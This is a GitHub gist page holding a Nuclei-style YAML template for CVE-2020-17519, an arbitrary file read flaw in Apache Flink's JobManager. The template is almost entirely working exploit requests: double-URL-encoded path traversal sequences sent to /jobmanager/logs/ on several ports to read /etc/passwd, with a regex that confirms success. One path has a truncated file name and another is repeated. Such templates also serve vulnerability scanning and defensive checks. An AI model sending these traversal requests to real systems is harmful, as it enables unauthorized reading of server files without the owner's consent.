Skip to content

Instantly share code, notes, and snippets.

@0xSojalSec
Forked from 0x240x23elu/CVE-2020-17519
Created July 13, 2022 14:48
Show Gist options
  • Save 0xSojalSec/20324f2f0dce3d1856e3dad77e1610a8 to your computer and use it in GitHub Desktop.
Save 0xSojalSec/20324f2f0dce3d1856e3dad77e1610a8 to your computer and use it in GitHub Desktop.
CVE-2020-17519
id: CVE-2020-17519
info:
name: Apache Flink Arbitrary file reading with JobManager
author: 0x240x23elu & 0rich1 of Ant Security FG Lab
severity: High
requests:
- method: GET
path:
- "{{BaseURL}}/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpassw"
- "{{BaseURL}}/#/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd"
- "{{BaseURL}}:8081/#/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd"
- "{{BaseURL}}:8080/#/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd"
- "{{BaseURL}}:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd"
- "{{BaseURL}}:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd"
matchers:
- type: regex
regex:
- "root:[x*]:0:0:"
part: body
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment